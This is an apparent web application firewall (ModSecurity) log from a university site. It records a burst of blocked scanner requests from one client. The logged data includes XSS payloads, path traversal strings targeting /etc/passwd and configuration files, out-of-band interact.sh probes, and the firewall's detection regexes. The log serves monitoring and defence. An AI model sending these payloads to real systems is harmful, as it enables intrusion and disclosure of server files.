[Tue Aug 29 11:51:08.571278 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO15PMCo-f0AAAmHd8kAAAAz"]
[Tue Aug 29 11:51:08.616062 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:log: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15PMCo-f0AAAm7m8cAAAAE"]
[Tue Aug 29 11:51:09.574763 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAfWOC4AAAAL"]
[Tue Aug 29 11:51:09.577058 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAm-MbkAAAAI"]
[Tue Aug 29 11:51:10.637518 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAnB5T4AAAAJ"]
[Tue Aug 29 11:51:11.601317 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAnGkHoAAAAR"]
[Tue Aug 29 11:51:12.759602 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QMCo-f0AAAmIbPUAAAAo"]
[Tue Aug 29 11:51:12.791439 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAmHd9UAAAAz"]
[Tue Aug 29 11:51:13.587243 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAfWODYAAAAL"]
[Tue Aug 29 11:51:13.720752 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAnEqTsAAAAO"]
[Tue Aug 29 11:51:14.688141 2023] [:error] [pid 2446] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAmOBc8AAAAU"]
[Tue Aug 29 11:51:15.671663 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAnCKyYAAAAK"]
[Tue Aug 29 11:51:15.766439 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15Q8Co-f0AAAnCKygAAAAK"]
[Tue Aug 29 11:51:15.877497 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAl4sXsAAAAf"]
[Tue Aug 29 11:51:15.920411 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15Q8Co-f0AAAmNp3IAAAAQ"]
[Tue Aug 29 11:51:16.575380 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAnCKy0AAAAK"]
[Tue Aug 29 11:51:17.749250 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAkr0EsAAAAC"]
[Tue Aug 29 11:51:17.852001 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAmIbPsAAAAo"]
[Tue Aug 29 11:51:20.533415 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAm-McoAAAAI"]
[Tue Aug 29 11:51:20.623359 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAm-McsAAAAI"]
[Tue Aug 29 11:51:21.545163 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAlUliIAAAA0"]
[Tue Aug 29 11:51:21.549173 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAmNp4AAAAAQ"]
[Tue Aug 29 11:51:21.703880 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAm80OgAAAAF"]
[Tue Aug 29 11:51:22.888052 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAnDFyQAAAAM"]
[Tue Aug 29 11:51:22.895972 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword"] [unique_id "ZO15SsCo-f0AAAkwQW8AAAAS"]
[Tue Aug 29 11:51:23.003946 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/api/sso/v2/sso/jwt"] [unique_id "ZO15S8Co-f0AAAknEOsAAAAB"]
[Tue Aug 29 11:51:23.548481 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:err: --><script>alert('2Ue0IThdcrNit2de4iq3Tr8D1X0')</script><!--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/remote/login"] [unique_id "ZO15S8Co-f0AAAnTlKAAAAAA"]
[Tue Aug 29 11:51:23.796748 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:viewSurveyError. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:viewSurveyError: Unknown survey\\x22><img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/Main/Default.aspx"] [unique_id "ZO15S8Co-f0AAAfWOEYAAAAL"]
[Tue Aug 29 11:51:24.965055 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:</script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:</script><script>alert(document.domain)</script>: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname 